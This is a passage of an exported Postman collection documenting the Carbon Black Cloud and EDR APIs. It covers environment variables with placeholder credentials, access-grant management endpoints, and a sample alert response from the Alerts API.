{"info":{"_postman_id":"198ade9c-4ba5-4b4f-bcc0-107c0f4806a9","name":"Carbon Black","description":"<html><head></head><body><p>Folders with a 🗝 icon indicate an authentication is provided on that for all of its children to inherit.</p>\n<p>Folders and endpoints with a ⚠️ icon indicate that endpoint has been deprecated. It may still function, but there are newer endpoints we recommend using.</p>\n<h2 id=\"postman-environments\">Postman Environments</h2>\n<p>These JSON objects are Environments that contain all of the variables used in this Postman Collection. Save the JSON locally and import into Postman.</p>\n<h3 id=\"carbon-black-cloud\">Carbon Black Cloud</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>{\n    \"id\": \"fb0486be-3019-4e77-9c71-33d5e588af98\",\n    \"name\": \"Carbon Black Cloud\",\n    \"values\": [\n        {\n            \"key\": \"cb_url\",\n            \"value\": \"https://defense.conferdeploy.net\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_org_key\",\n            \"value\": \"Org Key\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_custom_id\",\n            \"value\": \"Custom API ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_custom_key\",\n            \"value\": \"Custom API Key\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_api_id\",\n            \"value\": \"API ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_api_key\",\n            \"value\": \"API Secret Key\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_lr_id\",\n            \"value\": \"Live Response API ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_lr_key\",\n            \"value\": \"Live Response API Secret Key\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_siem_id\",\n            \"value\": \"SIEM ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_siem_key\",\n            \"value\": \"SIEM Secret Key\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_aggregation_field\",\n            \"value\": \"`device_id` or `process_sha256`\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_alert_id\",\n            \"value\": \"Alert ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_config_id\",\n            \"value\": \"Event Forwarder Config ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_cve_id\",\n            \"value\": \"CVE ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_device_id\",\n            \"value\": \"Device ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_device_control_id\",\n            \"value\": \"Device Control ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_event_id\",\n            \"value\": \"Event ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_feed_id\",\n            \"value\": \"Feed ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_forwarder_id\",\n            \"value\": \"Forwarder ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_ioc_id\",\n            \"value\": \"IOC ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_job_id\",\n            \"value\": \"Job ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_job_type\",\n            \"value\": \"\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_lr_command_id\",\n            \"value\": \"LR Command ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_lr_file_id\",\n            \"value\": \"Live Response File ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_lr_session_id\",\n            \"value\": \"LR Session ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_org_id\",\n            \"value\": \"Org ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_policy_id\",\n            \"value\": \"Policy ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_process_guid\",\n            \"value\": \"Process GUID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_query_id\",\n            \"value\": \"LiveQuery Query ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_report_id\",\n            \"value\": \"Report ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_reputation_id\",\n            \"value\": \"Reputation ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_request_id\",\n            \"value\": \"Request ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_rule_id\",\n            \"value\": \"Rule ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_template_id\",\n            \"value\": \"LiveQuery Template ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_vcenter_uuid\",\n            \"value\": \"vCenter UUID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_vm_id\",\n            \"value\": \"VM ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_watchlist_id\",\n            \"value\": \"Watchlist ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_wl_appliance_id\",\n            \"value\": \"Workload Appliance ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_wl_resource_id\",\n            \"value\": \"Workload Resource ID\",\n            \"enabled\": true\n        }\n    ],\n    \"_postman_variable_scope\": \"environment\",\n    \"_postman_exported_at\": \"2021-02-01T23:02:10.992Z\",\n    \"_postman_exported_using\": \"Postman/7.36.1\"\n}\n\n</code></pre><h3 id=\"carbon-black-edr-previously-cb-response\">Carbon Black EDR (previously CB Response)</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>{\n    \"id\": \"8d378ea8-9040-4eef-8b27-8238f24cd280\",\n    \"name\": \"Carbon Black Response\",\n    \"values\": [\n        {\n            \"key\": \"cb_url\",\n            \"value\": \"CB Response URL\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_api_token\",\n            \"value\": \"API Token\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_feed_id\",\n            \"value\": \"Feed ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_feed_action\",\n            \"value\": \"Feed Action\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_process_id\",\n            \"value\": \"Process ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_segment_id\",\n            \"value\": \"Segment ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_md5\",\n            \"value\": \"MD5\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_alert_id\",\n            \"value\": \"Alert ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_watchlist_id\",\n            \"value\": \"Watchlist ID\",\n            \"enabled\": true\n        },\n        {\n            \"key\": \"cb_feed_id\",\n            \"value\": \"Feed ID\",\n            \"enabled\": true\n        }\n    ],\n    \"_postman_variable_scope\": \"environment\",\n    \"_postman_exported_at\": \"2020-04-16T21:17:32.349Z\",\n    \"_postman_exported_using\": \"Postman/7.21.1\"\n}\n\n</code></pre></body></html>","schema":"https://schema.getpostman.com/json/collection/v2.0.0/collection.json","toc":[],"owner":"19038029","collectionId":"198ade9c-4ba5-4b4f-bcc0-107c0f4806a9","publishedId":"2s8YK4to5o","public":true,"customColor":{"top-bar":"FFFFFF","right-sidebar":"303030","highlight":"EF5B25"},"publishDate":"2022-10-27T17:33:34.000Z"},"item":[{"name":"Carbon Black Cloud (CBC)","item":[{"name":"Platform APIs 🗝","item":[{"name":"Access Profiles and Grants API","item":[{"name":"Create Grant for a Principal","id":"95f8e9b7-3ab0-49ec-ab15-9ab47321000f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"principal\": \"string\",\n    \"roles\": [\n        \"string\"\n    ],\n    \"profiles\": [\n        {\n            \"orgs\": {\n                \"allow\": [\n                    \"string\"\n                ],\n            },\n            \"roles\": [\n                \"string\"\n            ],\n            \"conditions\": {\n                \"expiration\": \"string\",\n                \"disabled\": boolean\n            }\n        }\n    ],\n    \"org_ref\": \"string\",\n    \"principal_name\": \"string\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/","description":"<p>Create grant for a Principal in given Org.</p>\n<p><em>Note: When using a role grant, you can only select one role. The profiles however do support multiple roles.</em></p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#create-grant-for-a-principal\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants",""],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"95f8e9b7-3ab0-49ec-ab15-9ab47321000f"},{"name":"Get Grant of a Principal","id":"de27bf42-8c94-4f77-aa94-a623306c5c30","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/psc:user:{{cb_org_key}}:{{cb_user_id}}","description":"<p>Get grant of a Principal(User or API Key) in a given Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#get-grant-of-a-principal\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","psc:user:{{cb_org_key}}:{{cb_user_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"de27bf42-8c94-4f77-aa94-a623306c5c30"},{"name":"Bulk Fetch Grants","id":"d48e6cb6-f3be-4bd2-899f-37a95dd88ce3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"principal\": \"string\",\n        \"org_ref\": \"string\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/_fetch","description":"<p>Bulk fetch grants for list of Principals and Organizations key pair.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#bulk-fetch-grants\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","_fetch"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"d48e6cb6-f3be-4bd2-899f-37a95dd88ce3"},{"name":"Get Permitted Roles","id":"57139996-2b70-4f0f-886a-270f6f0a90d9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/access/v3/orgs/{{cb_org_key}}/principals/{{cb_custom_id}}/roles/permitted?type=USER","description":"<p>Returns a list of roles that may be managed by the user making the request. Helps to identify roles in an organization and its child organizations (in a multi-tenant environment).</p>\n<p><em>Note: In order for this API call to function correctly, the {token} in the endpoint URL below must match the “token” portion of the API credentials specified in the X-Auth-Token header (everything after the ‘/’ character). Otherwise a 403 Forbidden error will be returned.</em></p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#get-permitted-roles\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v3","orgs","{{cb_org_key}}","principals","{{cb_custom_id}}","roles","permitted"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>USER or API_KEY</p>\n","type":"text/plain"},"key":"type","value":"USER"}],"variable":[]}},"response":[],"_postman_id":"57139996-2b70-4f0f-886a-270f6f0a90d9"},{"name":"Update Grant of a Principal","id":"0a6a6d3d-8305-4bc7-9825-86c9ce2b9c82","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"principal\": \"<string>\",\n    \"roles\": [\n        \"<string>\"\n    ],\n    \"profiles\": [\n        {\n            \"profile_uuid\": \"<string>\",\n            \"orgs\": {\n                \"allow\": [\n                    \"<string>\"\n                ]\n            },\n            \"roles\": [\n                \"<string>\"\n            ],\n            \"conditions\": {\n                \"expiration\": \"string\",\n                \"disabled\": boolean\n            }\n        }\n    ],\n    \"org_ref\": \"<string>\",\n    \"principal_name\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/{{cb_principal_urn}}","description":"<p>Update grant of a Principal in given Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#update-grant-of-a-principal\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","{{cb_principal_urn}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0a6a6d3d-8305-4bc7-9825-86c9ce2b9c82"},{"name":"Create Profile in Principal’s Grant","id":"05e1cdd5-a261-49b0-9be1-3cd6c02e29da","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"orgs\": {\n        \"allow\": [\n            \"<string>\"\n        ]\n    },\n    \"roles\": [\n        \"<string>\"\n    ],\n    \"conditions\": {\n        \"expiration\": \"string\",\n        \"disabled\": boolean\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/{{cb_principal_urn}}/profiles","description":"<p>Create profile in Principal’s grant in given Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#create-profile-in-principals-grant\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","{{cb_principal_urn}}","profiles"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"05e1cdd5-a261-49b0-9be1-3cd6c02e29da"},{"name":"Delete Grant for a Principal","id":"352cdb17-706b-4c26-ac30-8c52626f8dfb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/{{cb_principal_urn}}","description":"<p>Delete grant for a Principal in given Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#delete-grant-for-a-principal\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","{{cb_principal_urn}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"352cdb17-706b-4c26-ac30-8c52626f8dfb"},{"name":"Update Profile of Principal’s Grant","id":"c35b91e0-f0c8-47a0-b3af-cf89c315f420","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"profile_uuid\": \"string\",\n    \"orgs\": {\n        \"allow\": [\n            \"string\"\n        ],\n    },\n    \"roles\": [\n        \"string\"\n    ],\n    \"conditions\": {\n        \"expiration\": \"string\",\n        \"disabled\": boolean\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/{{cb_principal_urn}}/profiles/{{cb_profile_uuid}}","description":"<p>Update profile of Principal’s grant in given Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#update-profile-of-principals-grant\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","{{cb_principal_urn}}","profiles","{{cb_profile_uuid}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c35b91e0-f0c8-47a0-b3af-cf89c315f420"},{"name":"Delete Profile","id":"1d372bad-5e2a-40a5-af45-8207b5a70508","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/access/v2/orgs/{{cb_org_key}}/grants/{{cb_principal_urn}}/profiles/{{cb_profile_uuid}}","description":"<p>Delete profile with matching uuid from Principal’s grant in given Organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/access-profiles-and-grants/#delete-profile\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["access","v2","orgs","{{cb_org_key}}","grants","{{cb_principal_urn}}","profiles","{{cb_profile_uuid}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1d372bad-5e2a-40a5-af45-8207b5a70508"}],"id":"67ba80f3-7027-44b4-a3e3-5909b0cfbf36","description":"<p>These APIs let you manage (create/read/update/delete) roles for a principal in your organization. A principal and its access to the system is governed by the grant assigned. A principal can only have 1 grant. That grant can contain a role OR multiple profiles of role assignments.</p>\n<p>Note that if your organization uses Cloud Services Portal (CSP) then users and the roles assigned do not use these APIs. Review the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/authentication#determine-the-identity-manager\">Authentication Guide</a> on Developer Network to determine which identity manager you are using.</p>\n","_postman_id":"67ba80f3-7027-44b4-a3e3-5909b0cfbf36","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Alerts API","item":[{"name":"Search Alerts - Ungrouped","item":[{"name":"Get Alert Details","id":"db3627af-02ea-4876-8e86-331ea08ce260","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}","description":"<p>Get a single alert using an ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"277a2a1b-5ef3-484f-93bb-34efad27d76f","name":"Get Alert by Id - CB_ANALYTICS Alert","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[{"key":"Date","value":"Sun, 16 Apr 2023 17:04:26 GMT"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Content-Length","value":"1465"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=BBAF7A72659D43C2E6C0E48F6D680C5C; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"org_key\": \"ABCD1234\",\n    \"alert_url\": \"https://defense.conferdeploy.net/alerts?s[c][query_string]=id:fd077da9-3ada-9b4f-1c70-ad09f42be7d4&orgKey=ABCD1234\",\n    \"id\": \"fd077da9-3ada-9b4f-1c70-ad09f42be7d4\",\n    \"type\": \"CB_ANALYTICS\",\n    \"backend_timestamp\": \"2023-04-14T18:24:10.524Z\",\n    \"user_update_timestamp\": null,\n    \"backend_update_timestamp\": \"2023-04-14T18:24:12.387Z\",\n    \"detection_timestamp\": \"2023-04-14T18:21:54.593Z\",\n    \"first_event_timestamp\": \"2023-04-14T18:20:34.069Z\",\n    \"last_event_timestamp\": \"2023-04-14T18:20:34.665Z\",\n    \"category\": \"MONITORED\",\n    \"severity\": 3,\n    \"reason\": \"The application firefox.exe invoked another application (backgroundupdate.moz_log).\",\n    \"reason_code\": \"R_BOX_WEB_RUN\",\n    \"threat_id\": \"d6ea0f3012e949cf08d4fbc813892170\",\n    \"primary_event_id\": \"3a5c8a7ddaf111ed807c5b64aa8ee340\",\n    \"policy_applied\": \"APPLIED\",\n    \"run_state\": \"RAN\",\n    \"sensor_action\": \"DENY\",\n    \"workflow\": {\n        \"change_timestamp\": \"2023-04-14T18:24:10.524Z\",\n        \"changed_by_type\": \"SYSTEM\",\n        \"changed_by\": \"ALERT_CREATION\",\n        \"closure_reason\": \"NO_REASON\",\n        \"status\": \"OPEN\"\n    },\n    \"determination\": null,\n    \"tags\": null,\n    \"alert_notes_present\": false,\n    \"threat_notes_present\": false,\n    \"is_updated\": true,\n    \"device_id\": 17482451,\n    \"device_name\": \"DEV01-39X-1\",\n    \"device_uem_id\": \"\",\n    \"device_target_value\": \"MEDIUM\",\n    \"device_policy\": \"Lonergan policy\",\n    \"device_policy_id\": 20792247,\n    \"device_os\": \"WINDOWS\",\n    \"device_os_version\": \"Windows 10 x64\",\n    \"device_username\": \"bit9qa\",\n    \"device_location\": \"OFFSITE\",\n    \"device_external_ip\": \"66.170.99.2\",\n    \"device_internal_ip\": \"10.203.105.21\",\n    \"mdr_alert\": false,\n    \"threat_category\": \"NEW_MALWARE\",\n    \"ttps\": [\n        \"RUN_ANOTHER_APP\",\n        \"ATTEMPTED_CLIENT\",\n        \"POLICY_DENY\",\n        \"RUN_UNKNOWN_APP\",\n        \"UNKNOWN_APP\"\n    ],\n    \"attack_tactic\": \"\",\n    \"attack_technique\": \"\",\n    \"process_guid\": \"ABCD1234-123ab4c5de-0000104c-00000000-1d96efdcc7faa3a\",\n    \"process_pid\": 4172,\n    \"process_name\": \"c:\\\\programdata\\\\mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\\\updates\\\\308046b0af4a39cb\\\\backgroundupdate.moz_log\",\n    \"process_sha256\": \"1234567c35417a45313454fda1587d6857ea6c4a77b6faba1de55ccad4aa8436\",\n    \"process_md5\": \"\",\n    \"process_effective_reputation\": \"NOT_LISTED\",\n    \"process_reputation\": \"NOT_LISTED\",\n    \"process_cmdline\": \"\\\"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\\\" --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\\\\ProgramData\\\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\\\updates\\\\308046B0AF4A39CB\\\\backgroundupdate.moz_log --backgroundtask backgroundupdate\",\n    \"process_username\": \"DEMO\\\\DEMOUSER\",\n    \"process_signatures\": [],\n    \"parent_guid\": \"ABCD1234-010ac2d3-00001b34-00000000-1d96efdcc78018b\",\n    \"parent_pid\": 6964,\n    \"parent_name\": \"c:\\\\program files\\\\mozilla firefox.bak\\\\updated\\\\firefox.exe\",\n    \"parent_sha256\": \"a123bc45de58dc35a39df67d982301b0dd8016162a4188cf73d74adb15062d7524\",\n    \"parent_md5\": \"\",\n    \"parent_effective_reputation\": \"RESOLVING\",\n    \"parent_reputation\": \"NOT_LISTED\",\n    \"parent_cmdline\": \"\",\n    \"parent_username\": \"DEMO\\\\DEMOUSER\",\n    \"childproc_guid\": \"\",\n    \"childproc_username\": \"\",\n    \"childproc_cmdline\": \"\",\n    \"netconn_remote_port\": -1157562368,\n    \"netconn_local_port\": -1680277504,\n    \"netconn_protocol\": \"\",\n    \"netconn_remote_domain\": 